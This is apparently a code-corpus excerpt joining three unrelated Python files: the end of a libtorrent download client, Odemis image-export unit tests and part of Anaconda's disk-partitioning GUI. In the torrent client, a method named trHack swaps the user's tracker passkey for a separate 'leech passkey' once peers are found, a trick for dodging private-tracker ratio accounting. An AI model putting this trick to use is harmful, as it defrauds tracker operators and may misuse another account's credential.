# ses = lt.session(fingerprint)
ses = lt.session()
ses.listen_on(6881, 6891)
self.torrentHandle = ses.add_torrent({
'ti': self.info,
'save_path': self.output,
})
self.torrentHandle.set_download_limit(10000)
self.torrentHandle.set_upload_limit(self.uploadLimit)
self.torrentHandle.set_sequential_download(True)
# New Torrent
torrentName = self.torrentHandle.name()
self.Print('INITIALISATION')
# Replace Tracker
if self.replacePasskey:
self.trHack()
# Downloading
if(not self.torrentHandle.is_seed()):
self.Downloading()
del ses
# Stop if needed
if self.toStop:
return
# Complete
self.PrintStatus = True
self.Print('COMPLETED')
os.remove(self.torrentFile)
#
    # Replace the user passkey in the tracker URLs with a new one (after peering)
#
def trHack(self):
newTorrentTrackers = []
for tracker in self.torrentHandle.trackers():
            if self.userPasskey in tracker['url']:
                # swap the user passkey for the leech passkey inside the URL
                tracker['url'] = tracker['url'].replace(self.userPasskey,
                                                        self.leechPasskey)
            newTorrentTrackers.append(tracker)
# Peering
if len(newTorrentTrackers) > 0:
if (self.torrentHandle.status().num_peers < 1) and\
not self.torrentHandle.is_seed():
self.Peering()
self.torrentHandle.replace_trackers(newTorrentTrackers)
#
# Get peers list
#
def Peering(self):
torrentStatus = self.torrentHandle.status()
start = time()
while (not self.toStop and (torrentStatus.num_peers < 1) and
not self.torrentHandle.is_seed() and
not torrentStatus.paused):
if (torrentStatus.state == 1):
infosSTR = '%.2f%% %s' % (torrentStatus.progress * 100,
state_str[torrentStatus.state])
else:
infosSTR = 'Checking for peers: %d' %\
(torrentStatus.num_peers)
            now = time()
            # Give up if no peer shows up within 60 seconds
            if now - start > 60:
                self.toStop = True
                self.PrintStatus = True
                self.Print('NO PEERS FOUND')
                break
self.Print(infosSTR)
sleep(.5)
torrentStatus = self.torrentHandle.status()
if torrentStatus.paused and torrentStatus.error:
self.toStop = True
self.PrintStatus = True
self.Print(torrentStatus.error)
#
# Downloading
#
def Downloading(self):
torrentStatus = self.torrentHandle.status()
while (not self.toStop and not self.torrentHandle.is_seed()):
if (torrentStatus.state == 1):
infosSTR = '%.2f%% %s' % (torrentStatus.progress * 100,
state_str[torrentStatus.state])
else:
                infosSTR = ('%.2f%% (down: %.1f kB/s up: ' +
                            '%.1f kB/s peers: %d) %s') %\
(torrentStatus.progress * 100,
torrentStatus.download_rate / 1000,
torrentStatus.upload_rate / 1000,
torrentStatus.num_peers,
state_str[torrentStatus.state])
self.Print(infosSTR)
sleep(.1)
torrentStatus = self.torrentHandle.status()
self.torrentHandle.set_download_limit(self.downloadLimit)
#
# Stop
#
def Stop(self):
self.toStop = True
self.Print('STOPPED')
return
|
MisterDaneel/pytorrentClient
|
libs/my_libtorrent.py
|
Python
|
gpl-2.0
| 6,445
|
# -*- coding: utf-8 -*-
'''
Created on 19 Sep 2012
@author: piel
Copyright © 2012-2013 Éric Piel & Kimon Tsitsikas, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms
of the GNU General Public License version 2 as published by the Free Software
Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
'''
from __future__ import division
import cairo
import logging
import math
import numpy
import os
import time
import unittest
import wx
from odemis import model, dataio
from odemis.acq import stream
from odemis.gui.util import img
from odemis.gui.util.img import wxImage2NDImage, format_rgba_darray
logging.getLogger().setLevel(logging.DEBUG)
def GetRGB(im, x, y):
"""
return the r,g,b tuple corresponding to a pixel
"""
r = im.GetRed(x, y)
g = im.GetGreen(x, y)
b = im.GetBlue(x, y)
return (r, g, b)
class TestWxImage2NDImage(unittest.TestCase):
def test_simple(self):
size = (32, 64)
wximage = wx.EmptyImage(*size) # black RGB
ndimage = wxImage2NDImage(wximage)
self.assertEqual(ndimage.shape[0:2], size[-1:-3:-1])
self.assertEqual(ndimage.shape[2], 3) # RGB
self.assertTrue((ndimage[0, 0] == [0, 0, 0]).all())
# TODO alpha channel
class TestRGBA(unittest.TestCase):
def test_rgb_to_bgra(self):
size = (32, 64, 3)
rgbim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbim[:, :, 0] = 1
rgbim[:, :, 1] = 100
rgbim[:, :, 2] = 200
bgraim = format_rgba_darray(rgbim, 255)
# Checks it added alpha channel
self.assertEqual(bgraim.shape, (32, 64, 4))
self.assertEqual(bgraim[0, 0, 3], 255)
# Check the channels were swapped to BGR
self.assertTrue((bgraim[1, 1] == [200, 100, 1, 255]).all())
def test_rgb_alpha_to_bgra(self):
size = (32, 64, 3)
rgbim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbim[:, :, 0] = 1
rgbim[:, :, 1] = 100
rgbim[:, :, 2] = 200
bgraim = format_rgba_darray(rgbim, 0)
        # Check it added the alpha channel and applied the global alpha (0 => all zeros)
self.assertEqual(bgraim.shape, (32, 64, 4))
self.assertTrue((bgraim == 0).all())
def test_rgba_to_bgra(self):
size = (32, 64, 4)
rgbaim = model.DataArray(numpy.zeros(size, dtype=numpy.uint8))
rgbaim[:, :, 0] = 1
rgbaim[:, :, 1] = 100
rgbaim[:, :, 2] = 200
rgbaim[:, :, 3] = 255
rgbaim[2, 2, 3] = 0
bgraim = format_rgba_darray(rgbaim)
# Checks it added alpha channel
self.assertEqual(bgraim.shape, (32, 64, 4))
# Check the channels were swapped to BGR
self.assertTrue((bgraim[1, 1] == [200, 100, 1, 255]).all())
self.assertTrue((bgraim[2, 2] == [200, 100, 1, 0]).all())
class TestARExport(unittest.TestCase):
def test_ar_frame(self):
ar_margin = 100
img_size = 512, 512
ar_size = img_size[0] + ar_margin, img_size[1] + ar_margin
data_to_draw = numpy.zeros((ar_size[1], ar_size[0], 4), dtype=numpy.uint8)
surface = cairo.ImageSurface.create_for_data(
data_to_draw, cairo.FORMAT_ARGB32, ar_size[0], ar_size[1])
ctx = cairo.Context(surface)
app = wx.App() # needed for the gui font name
font_name = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT).GetFaceName()
tau = 2 * math.pi
ticksize = 10
num_ticks = 6
ticks_info = img.ar_create_tick_labels(img_size, ticksize, num_ticks, tau, ar_margin / 2)
ticks, (center_x, center_y), inner_radius, radius = ticks_info
# circle expected just on the center of the frame
self.assertEqual((center_x, center_y), (ar_size[0] / 2, ar_size[1] / 2))
self.assertLess(radius, ar_size[0] / 2) # circle radius within limits
img.draw_ar_frame(ctx, ar_size, ticks, font_name, center_x, center_y, inner_radius, radius, tau)
self.assertEqual(data_to_draw.shape[:2], ar_size) # frame includes the margin
def test_ar_raw(self):
data = model.DataArray(numpy.zeros((256, 256)), metadata={model.MD_AR_POLE: (100, 100),
model.MD_PIXEL_SIZE: (1e-03, 1e-03)})
raw_polar = img.calculate_raw_ar(data, data)
# shape = raw data + theta/phi axes values
self.assertGreater(raw_polar.shape[0], 50)
self.assertGreater(raw_polar.shape[1], 50)
def test_ar_export(self):
filename = "test-ar.csv"
# Create AR data
md = {
model.MD_SW_VERSION: "1.0-test",
model.MD_HW_NAME: "fake ccd",
model.MD_DESCRIPTION: "AR",
model.MD_ACQ_TYPE: model.MD_AT_AR,
model.MD_ACQ_DATE: time.time(),
model.MD_BPP: 12,
model.MD_BINNING: (1, 1), # px, px
model.MD_SENSOR_PIXEL_SIZE: (13e-6, 13e-6), # m/px
model.MD_PIXEL_SIZE: (2e-5, 2e-5), # m/px
model.MD_POS: (1.2e-3, -30e-3), # m
model.MD_EXP_TIME: 1.2, # s
model.MD_AR_POLE: (253.1, 65.1),
model.MD_LENS_MAG: 0.4, # ratio
}
md0 = dict(md)
data0 = model.DataArray(1500 + numpy.zeros((512, 512), dtype=numpy.uint16), md0)
md1 = dict(md)
md1[model.MD_POS] = (1.5e-3, -30e-3)
md1[model.MD_BASELINE] = 300 # AR background should take this into account
data1 = model.DataArray(3345 + numpy.zeros((512, 512), dtype=numpy.uint16), md1)
# Create AR stream
ars = stream.StaticARStream("test", [data0, data1])
ars.point.value = md1[model.MD_POS]
# Convert to exportable RGB image
exdata = img.ar_to_export_data([ars], raw=True)
# shape = raw data + theta/phi axes values
self.assertGreater(exdata.shape[0], 50)
self.assertGreater(exdata.shape[1], 50)
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exdata)
        st = os.stat(filename)  # this also tests that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
# TODO: check that exporting large AR image doesn't get crazy memory usage
def test_big_ar_export(self):
filename = "test-ar.csv"
# Create AR data
md = {
model.MD_SW_VERSION: "1.0-test",
model.MD_HW_NAME: "fake ccd",
model.MD_DESCRIPTION: "AR",
model.MD_ACQ_TYPE: model.MD_AT_AR,
model.MD_ACQ_DATE: time.time(),
model.MD_BPP: 12,
model.MD_BINNING: (1, 1), # px, px
model.MD_SENSOR_PIXEL_SIZE: (13e-6, 13e-6), # m/px
model.MD_PIXEL_SIZE: (2e-5, 2e-5), # m/px
model.MD_POS: (1.2e-3, -30e-3), # m
model.MD_EXP_TIME: 1.2, # s
model.MD_AR_POLE: (253.1, 65.1),
model.MD_LENS_MAG: 0.4, # ratio
}
md0 = dict(md)
data0 = model.DataArray(1500 + numpy.zeros((1080, 1024), dtype=numpy.uint16), md0)
# Create AR stream
ars = stream.StaticARStream("test", [data0])
ars.point.value = md0[model.MD_POS]
# Convert to exportable RGB image
exdata = img.ar_to_export_data([ars], raw=True)
# shape = raw data + theta/phi axes values
self.assertGreater(exdata.shape[0], 50)
self.assertGreater(exdata.shape[1], 50)
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exdata)
        st = os.stat(filename)  # this also tests that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpectrumExport(unittest.TestCase):
def setUp(self):
self.spectrum = model.DataArray(numpy.linspace(0, 750, 200),
metadata={model.MD_ACQ_TYPE: model.MD_AT_SPECTRUM})
self.spectrum_range = numpy.linspace(4.7e-07, 1.02e-06, 200)
self.unit = "m"
self.app = wx.App() # needed for the gui font name
def test_spectrum_ready(self):
exported_data = img.spectrum_to_export_data(self.spectrum, False, self.unit, self.spectrum_range)
self.assertEqual(exported_data.metadata[model.MD_DIMS], 'YXC') # ready for RGB export
self.assertEqual(exported_data.shape[:2],
(img.SPEC_PLOT_SIZE + img.SPEC_SCALE_HEIGHT + img.SMALL_SCALE_WIDTH,
img.SPEC_PLOT_SIZE + img.SPEC_SCALE_WIDTH + img.SMALL_SCALE_WIDTH)) # exported image includes scale bars
def test_spectrum_raw(self):
filename = "test-spec-spot.csv"
exported_data = img.spectrum_to_export_data(self.spectrum, True, self.unit, self.spectrum_range)
self.assertEqual(exported_data.shape[0], len(self.spectrum_range)) # exported image includes only raw data
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exported_data)
        st = os.stat(filename)  # this also tests that the file is created
self.assertGreater(st.st_size, 10)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpectrumLineExport(unittest.TestCase):
def setUp(self):
self.spectrum = model.DataArray(numpy.zeros(shape=(5, 1340, 3)),
metadata={model.MD_PIXEL_SIZE: (None, 4.2e-06),
model.MD_ACQ_TYPE: model.MD_AT_SPECTRUM})
self.spectrum_range = numpy.linspace(4.7e-07, 1.02e-06, 200)
self.unit = "m"
self.app = wx.App() # needed for the gui font name
def test_line_ready(self):
exported_data = img.line_to_export_data(self.spectrum, False, self.unit, self.spectrum_range)
self.assertEqual(exported_data.metadata[model.MD_DIMS], 'YXC') # ready for RGB export
self.assertEqual(exported_data.shape[:2],
(img.SPEC_PLOT_SIZE + img.SPEC_SCALE_HEIGHT + img.SMALL_SCALE_WIDTH,
img.SPEC_PLOT_SIZE + img.SPEC_SCALE_WIDTH + img.SMALL_SCALE_WIDTH)) # exported image includes scale bars
def test_line_raw(self):
filename = "test-spec-line.csv"
exported_data = img.line_to_export_data(self.spectrum, True, self.unit, self.spectrum_range)
self.assertEqual(exported_data.shape[0], self.spectrum.shape[1])
self.assertEqual(exported_data.shape[1], self.spectrum.shape[0])
# Save into a CSV file
exporter = dataio.get_converter("CSV")
exporter.export(filename, exported_data)
        st = os.stat(filename)  # this also tests that the file is created
self.assertGreater(st.st_size, 100)
# clean up
try:
os.remove(filename)
except Exception:
pass
class TestSpatialExport(unittest.TestCase):
def setUp(self):
self.app = wx.App()
data = numpy.zeros((2160, 2560), dtype=numpy.uint16)
dataRGB = numpy.zeros((2160, 2560, 4))
metadata = {'Hardware name': 'Andor ZYLA-5.5-USB3 (s/n: VSC-01959)',
'Exposure time': 0.3, 'Pixel size': (1.59604600574173e-07, 1.59604600574173e-07),
'Acquisition date': 1441361559.258568, 'Hardware version': "firmware: '14.9.16.0' (driver 3.10.30003.5)",
'Centre position': (-0.001203511795256, -0.000295338300158), 'Lens magnification': 40.0,
'Input wavelength range': (6.15e-07, 6.350000000000001e-07), 'Shear':-4.358492733391727e-16,
'Description': 'Filtered colour 1', 'Bits per pixel': 16, 'Binning': (1, 1), 'Pixel readout time': 1e-08,
'Gain': 1.1, 'Rotation': 6.279302551026012, 'Light power': 0.0, 'Display tint': (255, 0, 0),
'Output wavelength range': (6.990000000000001e-07, 7.01e-07)}
image = model.DataArray(data, metadata)
fluo_stream = stream.StaticFluoStream(metadata['Description'], image)
fluo_stream.image.value = model.DataArray(dataRGB, metadata)
data = numpy.zeros((1024, 1024), dtype=numpy.uint16)
dataRGB = numpy.zeros((1024, 1024, 4))
metadata = {'Hardware name': 'pcie-6251', 'Description': 'Secondary electrons',
'Exposure time': 3e-06, 'Pixel size': (5.9910982493639e-08, 6.0604642506361e-08),
'Acquisition date': 1441361562.0, 'Hardware version': 'Unknown (driver 2.1-160-g17a59fb (driver ni_pcimio v0.7.76))',
'Centre position': (-0.001203511795256, -0.000295338300158), 'Lens magnification': 5000.0, 'Rotation': 0.0,
'Shear': 0.003274715695854}
image = model.DataArray(data, metadata)
sem_stream = stream.StaticSEMStream(metadata['Description'], image)
sem_stream.image.value = model.DataArray(dataRGB, metadata)
self.streams = [fluo_stream, sem_stream]
self.min_res = (623, 432)
def test_no_crop_need(self):
"""
Data roi covers the whole window view
"""
view_hfw = (0.00025158414075691866, 0.00017445320835792754)
view_pos = [-0.001211588332679978, -0.00028726176273402186]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (1226, 1576, 4)) # RGB
def test_crop_need(self):
"""
Data roi covers part of the window view thus we need to crop the
intersection with the data
"""
view_hfw = (0.0005031682815138373, 0.0003489064167158551)
view_pos = [-0.001211588332679978, -0.00028726176273402186]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (2340, 2560, 4)) # RGB
def test_crop_and_interpolation_need(self):
"""
Data roi covers part of the window view and data resolution is below
the minimum limit thus we need to interpolate the data in order to
keep the shape ratio unchanged
"""
view_hfw = (0.0010063365630276746, 0.0006978128334317102)
view_pos = [-0.0015823014004405739, -0.0008081984265806109]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data([self.streams[0]], view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(exp_data[0].shape, (182, 1673, 4)) # RGB
def test_multiple_streams(self):
# Print ready format
view_hfw = (8.191282393266523e-05, 6.205915392651362e-05)
view_pos = [-0.001203511795256, -0.000295338300158]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(len(exp_data), 1)
self.assertEqual(len(exp_data[0].shape), 3) # RGB
# Post-process format
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, True)
self.assertEqual(len(exp_data), 2)
self.assertEqual(len(exp_data[0].shape), 2) # grayscale
self.assertEqual(len(exp_data[1].shape), 2) # grayscale
self.assertEqual(exp_data[0].shape, exp_data[1].shape) # all exported images must have the same shape
def test_no_intersection(self):
"""
Data has no intersection with the window view
"""
view_hfw = (0.0001039324002586505, 6.205915392651362e-05)
view_pos = [-0.00147293527265202, -0.0004728408264424368]
draw_merge_ratio = 0.3
with self.assertRaises(LookupError):
img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
def test_thin_column(self):
"""
Test that minimum width limit is fulfilled in case only a very thin
column of data is in the view
"""
view_hfw = (8.191282393266523e-05, 6.205915392651362e-05)
view_pos = [-0.0014443006338779269, -0.0002968821446105185]
draw_merge_ratio = 0.3
exp_data = img.images_to_export_data(self.streams, view_hfw, view_pos, draw_merge_ratio, False)
self.assertEqual(len(exp_data), 1)
self.assertEqual(len(exp_data[0].shape), 3) # RGB
self.assertEqual(exp_data[0].shape[1], img.CROP_RES_LIMIT)
if __name__ == "__main__":
unittest.main()
|
ktsitsikas/odemis
|
src/odemis/gui/util/test/img_test.py
|
Python
|
gpl-2.0
| 17,106
|
#
# partition_gui.py: allows the user to choose how to partition their disks
#
# Matt Wilson <msw@redhat.com>
# Michael Fulbright <msf@redhat.com>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gobject
import gtk
try:
import gnomecanvas
except ImportError:
import gnome.canvas as gnomecanvas
import pango
import autopart
import gui
import parted
import string
import copy
import types
import raid
from constants import *
import lvm
import isys
from iw_gui import *
from flags import flags
import lvm_dialog_gui
import raid_dialog_gui
import partition_dialog_gui
from rhpl.translate import _, N_
from partitioning import *
from partIntfHelpers import *
from partedUtils import *
from fsset import *
from partRequests import *
from constants import *
from partition_ui_helpers_gui import *
import logging
log = logging.getLogger("anaconda")
STRIPE_HEIGHT = 35.0
LOGICAL_INSET = 3.0
CANVAS_WIDTH_800 = 490
CANVAS_WIDTH_640 = 390
CANVAS_HEIGHT = 200
TREE_SPACING = 2
MODE_ADD = 1
MODE_EDIT = 2
# XXXX temporary image data
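# (inline gdk-pixbuf byte stream; "GdkP" is the magic header, decoded below
# via gtk.gdk.pixbuf_new_from_inline)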
new_checkmark = "GdkP"
new_checkmark = new_checkmark + "\0\0\2X"
new_checkmark = new_checkmark + "\1\1\0\2"
new_checkmark = new_checkmark + "\0\0\0""0"
new_checkmark = new_checkmark + "\0\0\0\14"
new_checkmark = new_checkmark + "\0\0\0\14"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&\0\0\0\217\0\0\0""3\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0,\0\0\0\252"
new_checkmark = new_checkmark + "\0\0\0\254\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0#\0\0\0\246\0\0\0\264\0\0\0\227\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\221\0\0\0\264\0\0\0\264"
new_checkmark = new_checkmark + "\0\0\0\214\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0U\0\0\0\264\0\0\0\264\0\0\0\202\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\40"
new_checkmark = new_checkmark + "\0\0\0\222\0\0\0\37\0\0\0\0\0\0\0\26\0\0\0\252\0\0\0\264\0\0\0\214\0"
new_checkmark = new_checkmark + "\0\0\16\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0u\0\0\0\264\0\0\0\240\0\0\0'\0\0"
new_checkmark = new_checkmark + "\0l\0\0\0\264\0\0\0\254\0\0\0!\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\24\0\0\0"
new_checkmark = new_checkmark + "\207\0\0\0\256\0\0\0\264\0\0\0\240\0\0\0\256\0\0\0\264\0\0\0d\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0;\0\0\0\233\0\0\0\263\0"
new_checkmark = new_checkmark + "\0\0\264\0\0\0\252\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\15\0\0\0r\0\0\0\263\0\0\0i\0\0\0\0\0\0\0\0\0\0\0"
new_checkmark = new_checkmark + "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0g\0\0"
new_checkmark = new_checkmark + "\0\"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
class DiskStripeSlice:
def eventHandler(self, widget, event):
if event.type == gtk.gdk.BUTTON_PRESS:
if event.button == 1:
self.parent.selectSlice(self.partition, 1)
elif event.type == gtk.gdk._2BUTTON_PRESS:
self.editCb()
return True
def shutDown(self):
self.parent = None
if self.group:
self.group.destroy()
self.group = None
del self.partition
def select(self):
if self.partition.type != parted.PARTITION_EXTENDED:
self.group.raise_to_top()
self.box.set(outline_color="red")
self.box.set(fill_color=self.selectColor())
def deselect(self):
self.box.set(outline_color="black", fill_color=self.fillColor())
def getPartition(self):
return self.partition
def fillColor(self):
if self.partition.type & parted.PARTITION_FREESPACE:
return "grey88"
return "white"
def selectColor(self):
if self.partition.type & parted.PARTITION_FREESPACE:
return "cornsilk2"
return "cornsilk1"
    def hideOrShowText(self):
        # Disabled for now: the early return keeps the slice label always
        # visible instead of hiding it when it overflows the box
        return
if self.box.get_bounds()[2] < self.text.get_bounds()[2]:
self.text.hide()
else:
self.text.show()
def sliceText(self):
if self.partition.type & parted.PARTITION_EXTENDED:
return ""
if self.partition.type & parted.PARTITION_FREESPACE:
rc = "Free\n"
else:
rc = "%s\n" % (get_partition_name(self.partition),)
rc = rc + "%Ld MB" % (getPartSizeMB(self.partition),)
return rc
def getDeviceName(self):
return get_partition_name(self.partition)
def update(self):
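        # Recompute this slice's canvas geometry: x offset and width scale
        # with the partition's sector range; logical partitions are inset
        # vertically by LOGICAL_INSET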
disk = self.parent.getDisk()
totalSectors = float(disk.dev.heads
* disk.dev.sectors
* disk.dev.cylinders)
# XXX hack but will work for now
if gtk.gdk.screen_width() > 640:
width = CANVAS_WIDTH_800
else:
width = CANVAS_WIDTH_640
xoffset = self.partition.geom.start / totalSectors * width
xlength = self.partition.geom.length / totalSectors * width
if self.partition.type & parted.PARTITION_LOGICAL:
yoffset = 0.0 + LOGICAL_INSET
yheight = STRIPE_HEIGHT - (LOGICAL_INSET * 2)
texty = 0.0
else:
yoffset = 0.0
yheight = STRIPE_HEIGHT
texty = LOGICAL_INSET
self.group.set(x=xoffset, y=yoffset)
self.box.set(x1=0.0, y1=0.0, x2=xlength,
y2=yheight, fill_color=self.fillColor(),
outline_color='black', width_units=1.0)
self.text.set(x=2.0, y=texty + 2.0, text=self.sliceText(),
fill_color='black',
anchor=gtk.ANCHOR_NW, clip=True,
clip_width=xlength-1, clip_height=yheight-1)
self.hideOrShowText()
def __init__(self, parent, partition, treeView, editCb):
self.text = None
self.partition = partition
self.parent = parent
self.treeView = treeView
self.editCb = editCb
pgroup = parent.getGroup()
self.group = pgroup.add(gnomecanvas.CanvasGroup)
self.box = self.group.add(gnomecanvas.CanvasRect)
self.group.connect("event", self.eventHandler)
self.text = self.group.add(gnomecanvas.CanvasText,
font="sans", size_points=8)
self.update()
class DiskStripe:
def __init__(self, drive, disk, group, tree, editCb):
self.disk = disk
self.group = group
self.tree = tree
self.drive = drive
self.slices = []
self.hash = {}
self.editCb = editCb
self.selected = None
# XXX hack but will work for now
if gtk.gdk.screen_width() > 640:
width = CANVAS_WIDTH_800
else:
width = CANVAS_WIDTH_640
group.add(gnomecanvas.CanvasRect, x1=0.0, y1=10.0, x2=width,
y2=STRIPE_HEIGHT, fill_color='green',
outline_color='grey71', width_units=1.0)
group.lower_to_bottom()
def shutDown(self):
while self.slices:
slice = self.slices.pop()
slice.shutDown()
if self.group:
self.group.destroy()
self.group = None
del self.disk
def holds(self, partition):
return self.hash.has_key(partition)
def getSlice(self, partition):
return self.hash[partition]
def getDisk(self):
return self.disk
def getDrive(self):
return self.drive
def getGroup(self):
return self.group
def selectSlice(self, partition, updateTree=0):
self.deselect()
slice = self.hash[partition]
slice.select()
# update selection of the tree
if updateTree:
self.tree.selectPartition(partition)
self.selected = slice
def deselect(self):
if self.selected:
self.selected.deselect()
self.selected = None
def add(self, partition):
stripe = DiskStripeSlice(self, partition, self.tree, self.editCb)
self.slices.append(stripe)
self.hash[partition] = stripe
class DiskStripeGraph:
def __init__(self, tree, editCb):
self.canvas = gnomecanvas.Canvas()
self.diskStripes = []
self.textlabels = []
self.tree = tree
self.editCb = editCb
self.next_ypos = 0.0
def __del__(self):
self.shutDown()
def shutDown(self):
# remove any circular references so we can clean up
while self.diskStripes:
stripe = self.diskStripes.pop()
stripe.shutDown()
while self.textlabels:
lab = self.textlabels.pop()
lab.destroy()
self.next_ypos = 0.0
def getCanvas(self):
return self.canvas
def selectSlice(self, partition):
for stripe in self.diskStripes:
stripe.deselect()
if stripe.holds(partition):
stripe.selectSlice(partition)
def getSlice(self, partition):
for stripe in self.diskStripes:
if stripe.holds(partition):
return stripe.getSlice(partition)
def getDisk(self, partition):
for stripe in self.diskStripes:
if stripe.holds(partition):
return stripe.getDisk()
def add(self, drive, disk):
# yoff = len(self.diskStripes) * (STRIPE_HEIGHT + 5)
yoff = self.next_ypos
text = self.canvas.root().add(gnomecanvas.CanvasText,
x=0.0, y=yoff,
font="sans",
size_points=9)
show_geometry = 0
if drive.find('mapper/mpath') != -1:
modelInfo = isys.getMpathModel(drive)
else:
modelInfo = disk.dev.model
if show_geometry:
drivetext = _("Drive %s (Geom: %s/%s/%s) "
"(Model: %s)") % ('/dev/' + drive,
disk.dev.cylinders,
disk.dev.heads,
disk.dev.sectors,
modelInfo)
else:
drivetext = _("Drive %s (%-0.f MB) "
"(Model: %s)") % ('/dev/' + drive,
partedUtils.getDeviceSizeMB(disk.dev),
modelInfo)
text.set(text=drivetext, fill_color='black', anchor=gtk.ANCHOR_NW,
weight=pango.WEIGHT_BOLD)
(xxx1, yyy1, xxx2, yyy2) = text.get_bounds()
textheight = yyy2 - yyy1 + 2
self.textlabels.append(text)
group = self.canvas.root().add(gnomecanvas.CanvasGroup,
x=0, y=yoff+textheight)
stripe = DiskStripe(drive, disk, group, self.tree, self.editCb)
self.diskStripes.append(stripe)
self.next_ypos = self.next_ypos + STRIPE_HEIGHT+textheight+10
return stripe
class DiskTreeModelHelper:
def __init__(self, model, columns, iter):
self.model = model
self.iter = iter
self.columns = columns
def __getitem__(self, key):
if type(key) == types.StringType:
key = self.columns[key]
try:
return self.model.get_value(self.iter, key)
except:
return None
def __setitem__(self, key, value):
if type(key) == types.StringType:
key = self.columns[key]
self.model.set_value(self.iter, key, value)
class DiskTreeModel(gtk.TreeStore):
isLeaf = -3
isFormattable = -2
# format: column header, type, x alignment, hide?, visibleKey
titles = ((N_("Device"), gobject.TYPE_STRING, 0.0, 0, 0),
(N_("Mount Point"), gobject.TYPE_STRING, 0.0, 0, isLeaf),
(N_("Type"), gobject.TYPE_STRING, 0.0, 0, 0),
# (N_("Format"), gobject.TYPE_BOOLEAN, 0.5, 0, isFormattable),
# (N_("Size (MB)"), gobject.TYPE_STRING, 1.0, 0, isLeaf),
(N_("Format"), gobject.TYPE_OBJECT, 0.5, 0, isFormattable),
(N_("Size (MB)"), gobject.TYPE_STRING, 1.0, 0, 0),
(N_("Start"), gobject.TYPE_STRING, 1.0, 0, 1),
(N_("End"), gobject.TYPE_STRING, 1.0, 0, 1),
("", gobject.TYPE_STRING, 0.0, 0, 0),
# the following must be the last two
("IsLeaf", gobject.TYPE_BOOLEAN, 0.0, 1, 0),
("IsFormattable", gobject.TYPE_BOOLEAN, 0.0, 1, 0),
("PyObject", gobject.TYPE_PYOBJECT, 0.0, 1, 0))
def __init__(self):
self.hiddenPartitions = []
self.titleSlot = {}
i = 0
types = [self]
self.columns = []
for title, kind, alignment, hide, key in self.titles:
self.titleSlot[title] = i
types.append(kind)
if hide:
i += 1
continue
elif kind == gobject.TYPE_OBJECT:
renderer = gtk.CellRendererPixbuf()
propertyMapping = {'pixbuf': i}
elif kind == gobject.TYPE_BOOLEAN:
renderer = gtk.CellRendererToggle()
propertyMapping = {'active': i}
elif (kind == gobject.TYPE_STRING or
kind == gobject.TYPE_INT):
renderer = gtk.CellRendererText()
propertyMapping = {'text': i}
# wire in the cells that we want only visible on leaf nodes to
# the special leaf node column.
if key < 0:
propertyMapping['visible'] = len(self.titles) + key
renderer.set_property('xalign', alignment)
if title == "Mount Point":
title = _("Mount Point/\nRAID/Volume")
elif title == "Size (MB)":
title = _("Size\n(MB)")
elif title != "":
title = _(title)
col = apply(gtk.TreeViewColumn, (title, renderer),
propertyMapping)
